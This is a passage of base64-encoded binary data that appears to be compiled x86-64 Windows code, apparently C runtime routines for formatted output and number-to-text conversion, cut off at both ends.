wxmDx9EAABIidq5IAAAAOhz/v//i0MMjVD/iVMMhcB15ukM////hf8PjxH///+D6AGJQwzrkcdDDP7////rog8fhAAAAAAAV1ZTSIPsIEGLQBBIic6J10yJw4XAeAU5wg9P+ItDDDn4D4/BAAAAx0MM/////4X/D4SfAAAAi0MIg+8BSAH36yMPH4AAAAAASGNDJIgMAotTJIPCAYlTJEg593REi0MISIPGAfbEQHUIi1MkOVMofuEPvg5IixP2xCB0zOjPSgAAi1Mk68xmLg8fhAAAAAAASGNDJMYEAiCLUySDwgGJUySLQwyNUP+JUwyFwH4ui0MI9sRAdQiLUyQ5Uyh+3UiLE/bEIHTKuSAAAADogEoAAItTJOvGx0MM/v///0iDxCBbXl/DDx9AACn4iUMMicKLQwj2xAR1KY1C/4lDDA8fAEiJ2rkgAAAA6DP9//+LQwyNUP+JUwyFwHXm6Q////+Qhf8PhRH///+D6gGJUwzrgUFUU0iD7ChIjQXCtgAASYnMSIXJSInTSGNSEEwPROBMieGF0nga6CVJAABIicJJidhMieFIg8QoW0Fc6ZD+///oi0kAAOvkZg8fhAAAAAAASIPsOEWLSAhBx0AQ/////0mJ0oXJdEnGRCQsLUiNTCQtTI1cJCxBg+EgMdJBD7YEEoPg30QJyIgEEUiDwgFIg/oDdehIjVEDTInZTCna6C3+//+QSIPEOMMPH4AAAAAAQffBAAEAAHQXxkQkLCtIjUwkLUyNXCQs66xmDx9EAABB9sFAdBrGRCQsIEiNTCQtTI1cJCzrj2YPH4QAAAAAAEyNXCQsTInZ6Xn///8PHwBVQVdBVkFVQVRXVlNIg+w4SI2sJIAAAABBic5MicOD+W8PhDkDAABFi3gQuAAAAABBi3gIRYX/QQ9Jx4PAEvfHABAAAA+FxgEAAESLawxEOehBD0zFSJhIg8APSIPg8Oj8+f//uQQAAABBuA8AAABIKcRMjWQkIEyJ5kiF0g+E9QEAAEWJ8UGD4SBmDx9EAABEicBIg8YBIdBEjVAwg8A3RAnIRYnTQYD6OkEPQsNI0+qIRv9IhdJ110w55g+EtgEAAEWF/w+OxQEAAEiJ8EWJ+Ewp4EEpwEWFwA+OsAEAAElj+EiJ8bowAAAASYn4SAH+6PpHAABMOeYPhK0BAABIifBMKeBEOegPjLoBAADHQwz/////QYP+bw+EIQIAAEG9//////ZDCQgPhVEDAABJOfQPg78AAACLewhFjXX/6x8PH4AAAAAASGNDJIgMAotDJIPAAYlDJEw55nY4i3sISIPuAffHAEAAAHUIi0MkOUMoft6B5wAgAAAPvg5IixN0xuiZRwAAi0Mkg8ABiUMkTDnmd8hFhe1/I+tbDx9AAEhjQyTGBAIgi0Mkg8ABiUMkQY1G/0WF9n49QYnGi3sI98cAQAAAdQiLQyQ5Qyh+24HnACAAAEiLE3TFuSAAAADoO0cAAItDJIPAAYlDJEGNRv9FhfZ/w0iNZbhbXl9BXEFdQV5BX13DDx+EAAAAAABmQYN4IAC5BAAAAA+ELwIAAEGJwEG5q6qqqkSLawxND6/BScHoIUQBwEQ56EEPTMVImEiDwA9Ig+Dw6BH4//9IKcRMjWQkIEGD/m8PhEkBAABBuA8AAABMieZIhdIPhRD+//8PH0QAAIHn//f//4l7CEWF/w+PQf7//2YPH0QAAEGD/m8PhB4BAABMOeYPhVz+//9Fhf8PhFP+///GBjBIg8YBSInwTCngRDnoD41M/v//Zg8fRAAAQSnFi3sIRIlrDEGD/m8PhPQAAAD3xwAIAAAPhBgBAABBg+0CRYXtfglFhf8PiPYBAABEiDZIg8YCxkb/MEWF7Q+OIf7//4t7CEWNdf/3xwAEAAAPhfgAAAAPH4AAAAAASInauSAAAADo2/j//0SJ8EGD7gGFwH/oQb7+////Qb3/////TDnmD4cI/v//6Z3+//9mDx9EAABFi3gQuAAAAABBi3gIRYX/QQ9Jx4PAGPfHABAAAA+FrQAAAESLawxBOcVBD03FSJhIg8APSIPg8OjD9v//uQMAAABIKcRMjWQkIEG4BwAAAOnC/P//Dx8A9kMJCA+E2P7//8YGMEiDxgHpzP7//2aQRYX/D4i3AAAARY11//fHAAQAAA+EP////0w55g+Hbv3//+nJ/f//Zg8fhAAAAAAARYX/D4jnAAAARY11//fHAAQAAA+ED////0k59A+CPv3//+mZ/f//Zg8fhAAAAAAAZkGDeCAAD4TTAAAAuQMAAADp2/3//2YuDx+EAAAAAABEi2sMRDnoQQ9MxUiYSIPAD0iD4PDo9vX//0G4DwAAAEgpxEyNZCQg6er9//8PHwBEiDZIg8YCxkb/MOmf/P//ifglAAYAAD0AAgAAD4U3////RY1N/0iJ8bowAAAARY15AUSJTaxNY/9NifhMAf7oLEQAAESLTaxFKelFic1Bg/5vD4Qt/v//gecACAAAD4Qh/v//6RH+//8PH4AAAAAAifglAAYAAD0AAgAAdKT3xwAIAAAPhfD9///p+v7//0SLawxEOehBD0zF6W/+//+QVUFXQVZBVUFUV1ZTSIPsKEiNrCSAAAAAuAAAAABEi3IQi3oIRYX2QQ9JxkiJ04PAF/fHABAAAHQLZoN6IAAPhTwCAACLcww5xg9NxkiYSIPAD0iD4PDo5fT//0gpxEyNZCQgQPbHgHQQSIXJD4hOAgAAQIDnf4l7CEiFyQ+EFgMAAEm7AwAAAAAAAIBBifpNieBJuc3MzMzMzMzMQYHiABAAAA8fRAAATY1oAU05xHQvRYXSdCpmg3sgAHQjTInATCngTCHYSIP4A3UUSY1AAkHGACxNiehJicVmDx9EAABIichJ9+FIichIweoDTI08kk0B/0wp+IPAMEGIAEiD+Ql2DUiJ0U2J6OudDx9EAABFhfYPjrcBAABMiehFifBMKeBBKcBFhcB+Fk1j+EyJ6bowAAAATYn4TQH96JBCAABNOewPhJ8BAACF9n4zTInoTCngKcaJcwyF9n4k98fAAQAAD4WYAQAARYX2D4ieAQAA98cABAAAD4TbAQAADx8AQPbHgA+E1gAAAEHGRQAtSY11AUk59HIg61NmDx9EAABIY0MkiAwCi0Mkg8ABiUMkSTn0dDiLewhIg+4B98cAQAAAdQiLQyQ5Qyh+3oHnACAAAA++DkiLE3TG6CFCAACLQySDwAGJQyRJOfR1yItDDOsaZg8fRAAASGNDJMYEAiCLUySLQwyDwgGJUySJwoPoAYlDDIXSfjCLSwj2xUB1CItTJDlTKH7eSIsTgOUgdMi5IAAAAOjGQQAAi1Mki0MM68RmDx9EAABIjWWoW15fQVxBXUFeQV9dww8fgAAAAAD3xwABAAB0OEHGRQArSY11Aekd////Zi4PH4QAAAAAAInCQbirqqqqSQ+v0EjB6iEB0Omt/f//Zg8fhAAAAAAATInuQPbHQA+E5v7//0HGRQAgSIPGAenY/v//Dx9EAABI99npuv3//w8fhAAAAAAATTnsD4Vw/v//RYX2D4Rn/v//Zg8fRAAAQcZFADBJg8UB6VP+//9mLg8fhAAAAAAAg+4BiXMMRYX2D4li/v//ifglAAYAAD0AAgAAD4VQ/v//i1MMjUL/iUMMhdIPjk7+//9IjXABTInpujAAAABJifBJAfXoh0AAAMdDDP/////pK/7//w8fAItDDI1Q/4lTDIXAD44X/v//Dx+AAAAAAEiJ2rkgAAAA6HPz//+LQwyNUP+JUwyFwH/mi3sI6e79//9mDx9EAABNieVFifBFhfYPj4P9///pLf///w8fQABVQVRXVlNIieVIg+wwg3kU/UmJzA+E5gAAAA+3URhmhdIPhLkAAABJY0QkFEiJ5kiDwA9Ig+Dw6FTx//9IKcRMjUX4SMdF+AAAAABIjVwkIEiJ2ehoRAAAhcAPjuAAAACD6AFIjXwDAeshZg8fRAAASWNEJCRBiAwAQYtEJCSDwAFBiUQkJEg533RBQYtUJAhIg8MB9sZAdQxBi0QkJEE5RCQoftkPvkv/TYsEJIDmIHS+TInC6JY/AABBi0QkJIPAAUGJRCQkSDnfdb9IifRIiexbXl9BXF3DDx+AAAAAAEyJ4rkuAAAA6FPy//+QSInsW15fQVxdww8fhAAAAAAASMdF+AAAAABIjV346Cc/AABIjU32SYnZQbgQAAAASIsQ6CpBAACFwH4uD7dV9mZBiVQkGEGJRCQU6eD+//9mkEyJ4rkuAAAA6PPx//9IifTpev///w8fAEEPt1QkGOvUVVdWU0iD7ChBi0EMic1IiddEicZMictFhcAPjhACAABBOcAPjvcAAADHQwz/////uP/////2QwkQdE1mg3sgAA+ECgEAALqrqqqqRI1GAkwPr8KJwknB6CFBjUj/KcFBg/gBdRvp5gAAAGYPH0QAAIPqAYnIAdCJUwwPhCoDAACF0n/sDx9AAIXtD4UiAQAAi1MI9sYBD4WEAgAAg+JAD4XzAgAAi0MMhcB+FYtTCIHiAAYAAIH6AAIAAA+EdwIAAEiNayCF9g+OuwEAAA8fAA+2B7kwAAAAhMB0B0iDxwEPvshIidro9fD//4PuAQ+E1AAAAPZDCRB01maDeyAAdM9pxquqqqo9VVVVVXfCSYnYugEAAABIienoIvH//+uwQYtREEQpwDnQD476/v//KdCJQwyF0g+OtAEAAIPoAYlDDIX2fgr2QwkQD4Xr/v//hcAPjjD///+F7Q+F+AAAAItTCPfCwAEAAA+E8QEAAIPoAYlDDA+EGP////bGBg+FD////4PoAYlDDGYPH0QAAEiJ2rkgAAAA6EPw//+LQwyNUP+JUwyFwH/mhe0PhN7+//9Iidq5LQAAAOgh8P//6eH+//8PH0AAi0MQhcB/GfZDCQh1E4PoAYlDEEiDxChbXl9dww8fQABIidnosPz//+shZg8fRAAAD7YHuTAAAACEwHQHSIPHAQ++yEiJ2ujN7///i0MQjVD/iVMQhcB/2EiDxChbXl9dww8fgAAAAACFwA+OSAEAAIPoAYtTEDnQD4/p/v//x0MM/////+k2/v//Zg8fRAAAg+gBiUMMD4RO////90MIAAYAAA+EE////0iJ2rktAAAA6GLv///pIv7//w8fRAAASInauTAAAADoS+///4tDEIXAfxT2QwkIdQ6F9nUd6Sr///8PH0QAAEiJ2ejo+///hfYPhFP///+LQxAB8IlDEA8fhAAAAAAASInauTAAAADoA+///4PGAXXu6Sz///9mDx+EAAAAAACLUwj2xggPhUD+//+F9g+OVP7//4DmEA+ES/7//2aDeyAAD4RA/v//6Sn9//8PHwBIidq5KwAAAOiz7v//6XP9//9mDx9EAACD6AGJQwxmkEiJ2rkwAAAA6JPu//+LQwyNUP+JUwyFwH/m6WL9//+Q9sYGD4Uq/f//i0MMjUj/iUsMhcAPjhn9///pEf7//5APhLX+///HQwz/////6fb8//9mDx9EAABIidq5IAAAAOg77v//6fv8//+J0Omf/f//ZmYuDx+EAAAAAAAPH0AAQVVBVFNIg+wgQboBAAAAQYPoAUGJy02JzE1j6EHB+B9Jac1nZmZmSMH5IkQpwXQbSGPBwfkfQYPCAUhpwGdmZmZIwfgiKciJwXXlQYtEJCyD+P91DkHHRCQsAgAAALgCAAAARDnQRInTRYtEJAxNieEPTdhEicCNSwIpyEE5yLn/////QbgBAAAAD07BRInZQYlEJAzopvv//0GLTCQIQYtEJCxMieJBiUQkEInIg+EgDcABAACDyUVBiUQkCOhd7f//RI1TAUyJ4kyJ6UUBVCQMSIPEIFtBXEFd6VD2//9BVFNIg+xoRItCENspSInTRYXAeGtBg8ABSI1EJEjbfCRQ8w9vRCRQSI1UJDBMjUwkTLkCAAAASIlEJCAPEUQkMOja6///RItEJExJicRBgfgAgP//dDmLTCRISYnZSInC6Lr+//9MieHoYhIAAJBIg8RoW0Fcw2YPH4QAAAAAAMdCEAYAAABBuAcAAADripCLTCRISYnYSInC6OHv//9MieHoKRIAAJBIg8RoW0Fcw0FUU0iD7GhEi0IQ2ylIidNFhcB5DcdCEAYAAABBuAYAAABIjUQkSNt8JFDzD29EJFBIjVQkMEyNTCRMuQMAAABIiUQkIA8RRCQw6CHr//9Ei0QkTEmJxEGB+ACA//90aItMJEhIicJJidnoQfr//4tDDOsYDx9AAEhjQyTGBAIgi1Mki0MMg8IBiVMkicKD6AGJQwyF0n4/i0sI9sVAdQiLUyQ5Uyh+3kiLE4DlIHTIuSAAAADo5jgAAItTJItDDOvEZg8fRAAAi0wkSEmJ2EiJwuj57v//TInh6EERAACQSIPEaFtBXMMPH4QAAAAAAEFUVlNIg+xgRItCENspSInTRYXAD4j+AAAAD4TgAAAASI1EJEjbfCRQ8w9vRCRQSI1UJDBMjUwkTLkCAAAASIlEJCAPEUQkMOgz6v//i3QkTEmJxIH+AID//w+E0AAAAItDCCUACAAAg/79fEuLUxA51n9EhcAPhMwAAAAp8olTEItMJEhJidlBifBMieLoLfn//+sQDx8ASInauSAAAADo++r//4tDDI1Q/4lTDIXAf+brKA8fQACFwHU0TInh6Jw3AACD6AGJQxCLTCRISYnZQYnwTIni6KT8//9MieHoTBAAAJBIg8RgW15BXMNmkItDEIPoAevPDx+EAAAAAADHQhABAAAAQbgBAAAA6Q7///9mDx9EAADHQhAGAAAAQbgGAAAA6fb+//9mDx9EAACLTCRISYnYSInC6KHt///rmw8fgAAAAABMieHoEDcAACnwiUMQD4km////i1MMhdIPjhv///8B0IlDDOkR////QVVBVFVXVlNIg+xYTIsRRItZCEUPv8NMid5DjQwASYnUTInSD7fJSMHqIIHi////f0QJ0onQ99gJ0MHoHwnIuf7/AAApwcHpEA+F2QIAAGZFhdsPiNcBAABmgeb/fw+FpAEAAE2F0g+FMwMAAEGLVCQQg/oOD4b1AQAAQYtMJAhIjXwkMEGLRCQQhcAPjp4EAADGRCQwLkiNRCQxxgAwSI1YAUWLVCQMvQIAAABFhdIPjooAAABBi1QkEEmJ2Q+/xkkp+UaNBAqF0onKRQ9PyIHiwAEAAIP6AUgPv9ZBg9n6SGnSZ2ZmZsH4H0WJyEjB+iIpwnQvZi4PH4QAAAAAAEhjwkGDwAHB+h9IacBnZmZmQY1oAkQpzUjB+CIp0InCdd4Pv+1FOcIPjmoDAABFKcL2xQYPhK4DAABFiVQkDJD2wYAPhTcDAAD2xQEPhV4DAACD4UAPhXUDAABMieK5MAAAAOjI6P//QYtMJAhMieKD4SCDyVjotej//0GLRCQMhcB+MkH2RCQJAnQqg+gBQYlEJAwPH0AATIniuTAAAADoi+j//0GLRCQMjVD/QYlUJAyFwH/iTI1sJC5IOft3JemQAQAADx8AQQ+3RCQgZolEJC5mhcAPhXQCAABIOfsPhHABAAAPvkv/SIPrAYP5Lg+E+gEAAIP5LHTNTIni6C3o///r1w8fAGaB/v9/dUGF0nU9RInBSI0V3qEAAE2J4IHhAIAAAOkJAQAADx9EAABBgUwkCIAAAABmgeb/fw+EIP7//+vCZi4PH4QAAAAAAEGLVCQQZoHu/z+D+g4Ph3UBAABNhdJ4DQ8fhAAAAAAATQHSefu5DgAAALgEAAAASdHqKdHB4QJI0+BJAcIPiDUCAABNAdK5DwAAACnRweECSdPqQYtMJAhIjXwkMEGJyUGJyEiJ+0GB4QAIAABBg+Ag6ycPH0QAADHASDn7dwlBi1QkEIXSeAmDwDCIA0iDwwFNhdIPhH4BAABEidKD4g9J98Lw////D4QDAQAAQYtEJBBJweoEhcB+CIPoAUGJRCQQhdJ0sonQg/oJdruNQjdECcDrtg8fAE2J4EiNFcWgAAAxyUiDxFhbXl9dQVxBXekr6v//Dx8ATIniuTAAAADo2+b//0GLRCQQjVD/QYlUJBCFwH/iQYtMJAhMieKD4SCDyVDot+b//0EBbCQMSA+/zkyJ4kGBTCQIwAEAAEiDxFhbXl9dQVxBXemh7///kA+ImwEAALgBwP//Dx9EAACJxoPoAU0B0nn2QYtUJBCD+g4Phq3+//9Bi0wkCOnW/v//Zg8fRAAAQYtMJAhIjXwkME2F0g+Fvf7//+mV/P//TInh6Pjy///p3/3//w8fAEg5+3cTRYXJdQ5Fi1wkEEWF234LDx9AAMYDLkiDwwGNRv9Jg/oBdBYPH4QAAAAAAInGSdHqjUb/SYP6AXXyRTHS6cz+//9mLg8fhAAAAAAATYngugEAAABMienoMOb//+l3/f//Dx8ASDn7D4Uy/P//6Q/8//9mLg8fhAAAAAAATIniuS0AAADoo+X//+nJ/P//Zg8fRAAAQcdEJAz/////6Zr8//9mLg8fhAAAAAAATIniuSsAAADoc+X//+mZ/P//Zg8fRAAAg8YB6cb9//9MieK5IAAAAOhT5f//6Xn8//9mDx9EAABBjUL/QYlEJAxFhdIPjkb8//9mDx9EAABMieK5IAAAAOgj5f//QYtEJAyNUP9BiVQkDIXAf+JBi0wkCOkY/P//Dx+EAAAAAABIifj2xQgPhGD7///pUfv//74CwP//6W/+//8PH0QAAEFXQVZBVUFUVVdWU0iB7KgAAABMi6QkEAEAAInPSInVRInDTInO6AUyAAAPvg4x0oHnAGAAAIsAZomUJJAAAACJnCSYAAAAicpIjV4BiUQkLEi4//////3///9IiYQkgAAAADHASIlsJHCJfCR4x0QkfP////9miYQkiAAAAMeEJIwAAAAAAAAAx4QklAAAAAAAAADHhCScAAAA/////4XJD4QwAQAATI0tEp4AAOtfRItEJHhB98AAQAAAdRCLhCSUAAAAOYQkmAAAAH4lQYHgACAAAEyLTCRwD4WAAAAASGOEJJQAAABBiBQBi4QklAAAAIPAAYmEJJQAAAAPthNIg8MBD77KhckPhMEAAACD+SV1nA+2A4l8JHhIx0QkfP////+EwA+EpAAAAEiJ3kyNVCR8RTH/RTH2QbsDAAAAjVDgSI1uAQ++yID6WncpD7bSSWNUlQBMAer/4g8fQABMicroiDAAAIuEJJQAAADpf////w8fQACD6DA8CQ+HqQYAAEGD/gMPh58GAABFhfYPhWoGAABBvgEAAABNhdIPhMsDAABBiwKFwA+IxQYAAI0EgI1EQdBBiQIPtkYBSInuDx+AAAAAAITAD4Vw////i4wklAAAAInISIHEqAAAAFteX11BXEFdQV5BX8MPHwBJjVwkCEGD/wMPhMgGAABFiwwkQYP/AnQUQYP/AQ+ERgYAAEGD/wV1BEUPtslMiUwkYIP5dQ+EhAYAAEyNRCRwTInKSYncSInr6JLm///puv7//w8fRAAAD7ZGAUG/AwAAAEiJ7kG+BAAAAOlo////gUwkeIAAAABJjVwkCEGD/wMPhF4GAABJYwwkQYP/AnQUQYP/AQ+E3AUAAEGD/wV1BEgPvslIiUwkYEiJyEiNVCRwSYncSInrSMH4P0iJRCRo6Drr///pQv7//0GD7wJJiwwkSY1cJAhBg/8BD4bcBAAASI1UJHBJidxIievo7uT//+kW/v//QYPvAkGLBCRJjVwkCMeEJIAAAAD/////QYP/AQ+GuwIAAEiNTCRgTI1EJHCIRCRgSYncugEAAABIievoeeP//+nR/f//SYsUJEhjhCSUAAAASYPECEGD/wUPhF8FAABBg/8BD4T1BQAAQYP/AnQKQYP/Aw+ELAYAAIkCSInr6ZP9//+LRCR4SYsUJEmDxAiDyCCJRCR4qAQPhAsCAADbKkiNTCRASI1UJHBIievbfCRA6BP3///pW/3//0WF9nUKOXwkeA+EjwQAAEmLFCRJjVwkCEyNRCRwuXgAAABIx0QkaAAAAABJidxIietIiVQkYOjz5P//6Rv9//8PtkYBPDYPhDQFAAA8Mw+ELAQAAEiJ7kG/AwAAAEG+BAAAAOm+/f//i0QkeEmLFCRJg8QIg8ggiUQkeKgED4TbAQAA2ypIjUwkQEiNVCRwSInr23wkQOhj8///6bv8//8PtkYBPGgPhK4EAABIie5BvwEAAABBvgQAAADpZv3//w+2RgE8bA+EdQQAAEiJ7kG/AgAAAEG+BAAAAOlG/f//i0wkLEiJ6+gaLQAASI1UJHBIicHoNeP//+ld/P//i0QkeEmLFCRJg8QIg8ggiUQkeKgED4R9AQAA2ypIjUwkQEiNVCRwSInr23wkQOh98///6SX8//+LRCR4SYsUJEmDxAiDyCCJRCR4qAQPhH0BAADbKkiNTCRASI1UJHBIievbfCRA6DX0///p7fv//w+2RgGDTCR4BEiJ7kG+BAAAAOmh/P//RYX2dUQPtkYBgUwkeAAEAABIie7piPz//0GD/gEPhjYDAAAPtkYBQb4EAAAASInu6Wz8//9FhfYPhZACAACBTCR4AAIAAA8fAA+2RgFIie7pTPz//4tEJHhJixQkSYPECKgED4X1/f//SIlUJDDdRCQwSI1UJHBIietIjUwkQNt8JEDoAfX//+lJ+///x4QkgAAAAP////9JjVwkCEGLBCRIjUwkYEyNRCRwSYncugEAAABIietmiUQkYOhZ3///6RH7//+LRCR4SYsUJEmDxAioBA+FJf7//0iJVCQw3UQkMEiNVCRwSInrSI1MJEDbfCRA6IHx///p2fr//4tEJHhJixQkSYPECKgED4WD/v//SIlUJDDdRCQwSI1UJHBIietIjUwkQNt8JEDo+fH//+mh+v//i0QkeEmLFCRJg8QIqAQPhYP+//9IiVQkMN1EJDBIjVQkcEiJ60iNTCRA23wkQOix8v//6Wn6//9IjVQkcLklAAAASInr6Dre///pUvr//0WF9g+FvP7//0yNTCRgTIlUJDiBTCR4ABAAAEyJTCQwx0QkYAAAAADoACsAAEyLTCQwSI1MJF5BuBAAAABIi1AI6P8sAABMi1QkOEG7AwAAAIXAfg0Pt1QkXmaJlCSQAAAAiYQkjAAAAA+2RgFIie7pqPr//02F0g+EIf7//0H3xv3///8PhdcAAABBiwQkSY1UJAhBiQKFwA+IBgIAAA+2RgFJidRIie5FMdLpbPr//0WF9g+FC/7//4FMJHgAAQAA6f79//9FhfYPhfX9//8PtkYBg0wkeEBIie7pPPr//0WF9g+F2/3//w+2RgGBTCR4AAgAAEiJ7ukf+v//SY1cJAhNiyQkSI0F95YAAE2F5EwPROCLhCSAAAAAhcAPiEYBAABIY9BMieHodikAAEyJ4UiJwkyNRCRwSYnc6FPd//9IievpCPn//0GD/gN3MbkwAAAAQYP+AkUPRPPpj/n//w+2RgFFMdJIie5BvgQAAADppvn//4B+AjIPhEcBAABIjVQkcLklAAAA6KXc///pvfj//8eEJIAAAAAQAAAAifiAzAKJRCR46Vj7//9FD7fJTIlMJGDpu/n//0gPv8lIiUwkYOkl+v//g+kwQYkK6fD8//8PtkYBQb4CAAAASInux4QkgAAAAAAAAABMjZQkgAAAAOkj+f//iAJIievpTvj//0iNVCRwTInJSYncSInr6C7l///pNvj//02LDCRMiUwkYOlN+f//SYsMJEiJTCRg6bf5//8PtkYCQb8DAAAASIPGAkG+BAAAAOnM+P//D7ZGAkG/BQAAAEiDxgJBvgQAAADps/j//0yJ4ehjKAAA6bj+//+AfgI0D4UA////D7ZGA0G/AwAAAEiDxgNBvgQAAADpg/j//2aJAkiJ6+mt9///RYX2dUIPtkYB91wkfEmJ1EiJ7oFMJHgABAAARTHS6VX4//8PtkYDQb8CAAAASIPGA0G+BAAAAOk8+P//SIkCSInr6Wb3///HhCSAAAAA/////+mj/f//kJCQkJCQkJCQU0iD7CAx24P5G34YuAQAAAAPH4AAAAAAAcCDwwGNUBc5ynz0idnodRsAAIkYSIPABEiDxCBbw2YPH4QAAAAAAFdWU0iD7CBIic5IiddBg/gbfmW4BAAAADHbZg8fRAAAAcCDwwGNUBdBOdB/84nZ6CwbAABIjVYBiRgPtg5MjUAEiEgETInAhMl0Fg8fRAAAD7YKSIPAAUiDwgGICITJde9Ihf90A0iJB0yJwEiDxCBbXl/DDx9AADHb67EPH0AAugEAAABIiciLSfzT4olIBEiNSPyJUAjpxBsAAA8fQABBV0FWQVVBVFVXVlNIg+w4McCLchRJicxJidM5cRQPjOwAAACD7gFIjVoYSI1pGDHSTGPWScHiAkqNPBNJAeqLB0WLAo1IAUSJwPfxiUQkLEGJxUE5yHJeQYnHSYnZSYnoRTH2MdJmLg8fhAAAAAAAQYsBQYsISYPBBEmDwARJD6/HTAHwSYnGicBIAdBJwe4gSCnBSInIQYlI/EjB6CCD4AFIicJMOc9zxkWLCkWFyQ+EnQAAAEyJ2kyJ4ehPIQAAhcB4R0GNRQFJieiJRCQsMcBmDx9EAACLC0GLEEiDwwRJg8AESAHISCnCSInQQYlQ/EjB6CCD4AFIOd9z2khjxkiNRIUAiwiFyXQli0QkLEiDxDhbXl9dQVxBXUFeQV/DDx+AAAAAAIsQhdJ1DIPuAUiD6ARIOcVy7kGJdCQU68sPH4AAAAAARYsCRYXAdQyD7gFJg+oETDnVcuxBiXQkFEyJ2kyJ4eikIAAAhcAPiVH////rlpCQkJCQkJCQkJBBV0FWQVVBVFVXVlNIgey4AAAADxG0JKAAAACLhCQgAQAAQYspRIu0JCgBAACJRCQgSIuEJDABAABIic9Mic6JVCRASIlEJChIi4QkOAEAAEyJRCQ4SIlEJDCJ6IPgz0GJAYnog+AHg/gDD4TQAgAAieuD4wSJXCRIdTWFwA+EjQIAAIPoATHbg/gBdmsPELQkoAAAAEiJ2EiBxLgAAABbXl9dQVxBXUFeQV/DDx9AADHbg/gEddZIi0QkKEiLVCQwQbgDAAAASI0NW5MAAMcAAID//w8QtCSgAAAASIHEuAAAAFteX11BXEFdQV5BX+ns/P//Dx9AAESLIbggAAAAMclBg/wgfgoBwIPBAUE5xH/26CkYAABFjUQk/0HB+AVJicdIi0QkOE1jwEmNVxhJweACSo0MAGYPH4QAAAAAAESLCEiDwARIg8IERIlK/Eg5wXPsSItcJDhIg8EBSY1ABEiNUwFIOdG6BAAAAEgPQsJIwfgCicNJjQSH6w8PHwBIg+gEhdsPhNwBAABEi1gUidqD6wFFhdt05khj20GJVxTB4gVBD71EnxiJ04PwHynDTIn56AcWAABEi2wkQImEJJwAAACFwA+FqwEAAEWLVxRFhdIPhCYBAABIjZQknAAAAEyJ+ejGIAAA8g8QDU6SAABFjUQdAGZID37CZkgPfsBBjUj/SMHqIInAQYnJgeL//w8AQcH5H4HKAADwP0WJy0mJ0kExy0nB4iBFKctMCdBBges1BAAAZkgPbsDyD1wF65EAAPIPWQXrkQAA8g9YyGYP78DyDyrB8g9ZBeeRAADyD1jBRYXbfhVmD+/J8kEPKsvyD1kN1ZEAAPIPWMFmD+/28kQPLNBmDy/wD4ceBwAAQYnLicBBweMURAHaSMHiIEgJ0EiJhCSAAAAASYnDidgpyI1I/4lMJFBBg/oWD4fbAAAASIsNJJQAAElj0mZJD27r8g8QBNFmDy/FD4ZtAwAAx4QkiAAAAAAAAABBg+oB6bQAAABmDx+EAAAAAABMifnoOBcAAA8fhAAAAAAASItEJChIi1QkMEG4AQAAAEiNDQaRAADHAAEAAADorvr//0iJw+lT/f//Zg8fRAAASItEJChIi1QkMEG4CAAAAEiNDcmQAADHAACA///pcv3//2YPH0QAAEHHRxQAAAAA6Tz+//8PHwCJwkyJ+eg+EwAARItsJEArnCScAAAARAOsJJwAAADpMv7//w8fRAAAx4QkiAAAAAEAAABEi0wkUMdEJGAAAAAARYXJD4jPBQAARYXSD4mlAgAARInQRClUJGD32ESJVCRwRTHSiUQkdItEJCCD+AkPh6MCAACD+AUPj+IFAABBgcD9AwAAMcBBgfj3BwAAD5bAiUQkVItEJCCD+AQPhD4LAACD+AUPhI0JAACD+AIPhbQGAADHRCRoAAAAAEWF9rkBAAAAQQ9PzomMJJwAAABBic6JjCSMAAAAiUwkTESJVCR46EH5//+DfCRMDkQPtkwkVEiJRCRYD5bARItUJHhBIcGLRwyD6AGJRCRUdCiLVCRUuAIAAACF0g9JwoPlCIlEJFSJwQ+EzQUAALgDAAAAKciJRCRURYTJD4S5BQAAi0QkVAtEJHAPhasFAABEi4QkiAAAAMeEJJwAAAAAAAAA8g8QhCSAAAAARYXAdBLyDxAlco8AAGYPL+APhxwOAABmDxDI8g9YyPIPWA1wjwAAZkgPfspmSA9+yEjB6iCJwIHqAABAA0jB4iBICdCLVCRMhdIPhA4FAABEi1wkTDHtSIsVsZEAAGZID27QQY1D/0iY8g8QJMKLRCRohcAPhMYMAADyDxANPY8AAPIPLNBIi0wkWPIPXsxIjUEB8g9cymYP79LyDyrSg8IwiBHyD1zCZg8vyA+HzQ8AAPIPECXFjgAA8g8QHcWOAADrSQ8fAIuMJJwAAACNUQGJlCScAAAARDnaD42mBAAA8g9Zw2YP79JIg8AB8g9Zy/IPLNDyDyrSg8IwiFD/8g9cwmYPL8gPh3IPAABmDxDU8g9c0GYPL8p2rI19AQ+2UP9Ii1wkWEiJwYl8JFDrFw8fgAAAAABIOdgPhFYOAAAPtlD/SInBSI1B/4D6OXTnSIlMJFiDwgGIEMdEJEggAAAA6Q8DAAAPH4QAAAAAAItUJFDHRCRgAAAAAMeEJIgAAAAAAAAAhdIPiCEDAABEAVQkUESJVCRwx0QkdAAAAADpWv3//2YuDx+EAAAAAADHRCQgAAAAAGYP78BEiVQkTPJBDyrE8g9ZBaqNAADyDyzIg8EDiYwknAAAAOjf9v//RItUJExIiUQkWItHDIPoAYlEJFQPhREDAABFhe0PiFgNAACLRCRwOUcUD42JCAAAx0QkTP////9FMfbHhCSMAAAA/////2YPH4QAAAAAAEEp3ESJ6YtXBEGNRCQBRCnhiYQknAAAADnRD42QBgAARItcJCBBjUv9g+H9D4R+BgAAQSnVQYP7AUSLXCRMD5/BQY1FAUWF24mEJJwAAAAPn8KE0XQJRDnYD49cBgAAi1QkYAFEJFBEi2wkdAHQidWJRCRguQEAAABEiVQkeOjNEwAAx0QkaAEAAABEi1QkeEmJxIXtfiKLTCRQhcl+GjnNicgPTsUpRCRgKcGJhCScAAAAKcWJTCRQRItMJHRFhcl0W0SLRCRoRYXAD4RzCAAARYXtfjtMieFEiepEiZQkgAAAAOiHFQAATIn6SInBSYnE6BkUAABMiflIiUQkeOgsEgAATIt8JHhEi5QkgAAAAItUJHREKeoPhVMIAAC5AQAAAESJVCR06CMTAACD+wFEi1QkdA+Uw4N8JCABSYnFD57AIcNFhdIPjwIDAADHRCR0AAAAAITbD4VDCwAAvx8AAABFhdIPhQcDAAArfCRQRItEJGCD7wSD5x9BAfiJvCScAAAAifpFhcB+FUSJwkyJ+ejZFgAAi5QknAAAAEmJxwNUJFCF0n4LTInp6L8WAABJicWLjCSIAAAAg3wkIAIPn8OFyQ+FNQUAAItEJEyFwA+PuQIAAITbD4SxAgAAi0QkTIXAD4VKAgAATInpRTHAugUAAADopREAAEyJ+UiJwkmJxeh3FwAAhcAPjiQCAACLRCRwSItcJFiDwAKJRCRQSINEJFgBxgMxx0QkSCAAAABMieno9hAAAE2F5HQITInh6OkQAABMifno4RAAAEiLfCQoSItEJFiLTCRQxgAAiQ9Ii3wkMEiF/3QDSIkHi0